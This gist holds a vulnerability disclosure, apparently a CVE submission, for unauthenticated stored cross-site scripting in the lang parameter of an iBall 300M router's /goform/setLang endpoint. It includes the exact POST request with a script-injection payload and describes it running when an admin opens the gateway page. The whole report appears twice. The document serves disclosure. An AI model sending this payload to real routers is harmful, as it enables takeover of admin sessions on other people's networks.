MayurUdiniya/gist:597169f582e506b610beb4e84fd8c8fc

## gistfile1.txt
> /goform/setLang on iBall 300M devices with "iB-WRB302N_1.0.1-Sep 8
> 2017" firmware has Unauthenticated Stored Cross Site Scripting via the
> lang parameter.
>
> ------------------------------------------
>
> [Additional Information]
> Below find the Vulnerable POST request
>
> POST /goform/setLang HTTP/1.1
> Cookie: bLanguage=en
>
> lang=en";</script><script>alert(document.domain);</script>
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> iBall
>
> ------------------------------------------
>
> [Affected Product Code Base]
> 300M 2-Port Wireless-N Broadband Router - iB-WRB302N_1.0.1-Sep 8 2017
>
> ------------------------------------------
>
> [Affected Component]
> iBall 300M 2-Port Wireless-N Broadband Router is affected by Stored Cross Site
> Scripting - "lang" parameter is vulnerable for XSS
>
> ------------------------------------------
>
> [Attack Type]
> Local
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Denial of Service]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> An unauthenticated attacker will set lang parameter to
> "lang=en";</script><script>alert(document.domain);</script>" - the
> JavaScript will be stored in the router homepage. Whenever an admin goes
> to the router gateway (i.e., 192.168.1.1), stored XSS will execute.
>
> ------------------------------------------
>
> [Discoverer]
> Mayur Udiniya
	> /goform/setLang on iBall 300M devices with "iB-WRB302N_1.0.1-Sep 8
	> 2017" firmware has Unauthenticated Stored Cross Site Scripting via the
	> lang parameter.
	>
	> ------------------------------------------
	>
	> [Additional Information]
	> Below find the Vulnerable POST request
	>
	> POST /goform/setLang HTTP/1.1
	> Cookie: bLanguage=en
	>
	> lang=en";</script><script>alert(document.domain);</script>
	>
	> ------------------------------------------
	>
	> [Vulnerability Type]
	> Cross Site Scripting (XSS)
	>
	> ------------------------------------------
	>
	> [Vendor of Product]
	> iBall
	>
	> ------------------------------------------
	>
	> [Affected Product Code Base]
	> 300M 2-Port Wireless-N Broadband Router - iB-WRB302N_1.0.1-Sep 8 2017
	>
	> ------------------------------------------
	>
	> [Affected Component]
	> iBall 300M 2-Port Wireless-N Broadband Router is affected by Stored Cross Site
	> Scripting - "lang" parameter is vulnerable for XSS
	>
	> ------------------------------------------
	>
	> [Attack Type]
	> Local
	>
	> ------------------------------------------
	>
	> [Impact Code execution]
	> true
	>
	> ------------------------------------------
	>
	> [Impact Denial of Service]
	> true
	>
	> ------------------------------------------
	>
	> [Impact Information Disclosure]
	> true
	>
	> ------------------------------------------
	>
	> [Attack Vectors]
	> An unauthenticated attacker will set lang parameter to
	> "lang=en";</script><script>alert(document.domain);</script>" - the
	> JavaScript will be stored in the router homepage. Whenever an admin goes
	> to the router gateway (i.e., 192.168.1.1), stored XSS will execute.
	>
	> ------------------------------------------
	>
	> [Discoverer]
	> Mayur Udiniya